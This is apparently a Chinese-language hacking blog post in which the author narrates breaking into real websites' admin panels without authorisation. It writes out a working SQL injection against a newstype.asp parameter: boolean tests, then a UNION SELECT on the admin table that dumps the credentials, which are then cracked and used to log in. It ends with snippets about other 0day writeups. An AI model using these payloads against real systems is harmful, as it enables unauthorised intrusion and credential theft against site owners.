第乙個杭州開泰實際上已經不能愉快的玩耍了,於是很幸運的找到乙個可以拿來玩耍的,具體不上圖。
當然,登進去後看了看後台的ip記錄,也已經被光顧了無數次,都快被玩爛了
剩下的一些要麼裝了安全狗,要麼就是創宇的防火牆。
效果如圖:
接下來記錄一下另乙個站的注入:
首先,在首頁後加newstype.asp?smallclass=%27%20and%20%271%27=%271,發現正常。
然後構造如下注入newstype.asp?smallclass=%27%20and%20%271%27=%272,報錯。
之後照著教程輸入' and 1=2 union select 1,2,3,4,5,6,7,8,9,0 from admin where '1'='1
發現無卵用,於是猜想admin的表結構改了,於是將0改為10,並加到11,然後賬號和密碼就爆出來了,送到somd5破解之後就登上去了。只不過我沒繼續上傳一句話嘗試拿shell。教程畢竟是教程,新手學習千萬不能生搬硬套,得針對情況作出改變。
LuManager高危SQL注入0day分析
2015年9月7日阿里雲盾態勢感知系統捕獲到lumanager系統的0day一枚,經證實,該漏洞一旦被黑客利用可直接以最高許可權登陸後台,上傳webshell,控制系統資料庫 操作虛擬主機,後果不堪設想。lumanager是一種基於freebsd zijidelu debian centos ubu...
最土團購0day
先看頁面 include library db.class.php,如下 code static public function getdbrowbyid table,ids array where id in var dump q r self getqueryresult q,one 沒有過濾,...
Windows 被曝 0day 漏洞
安全研究人員在推特上公布了 windows 作業系統中的乙個漏洞詳情。該漏洞是乙個 本地許可權提公升 問題,可導致攻擊者將惡意 的訪問許可權從有限的 user 角色提公升至完全訪問 system 賬戶。cert cc 的工程師 will dormann 已證實該漏洞存在並在前天晚上發布 cert c...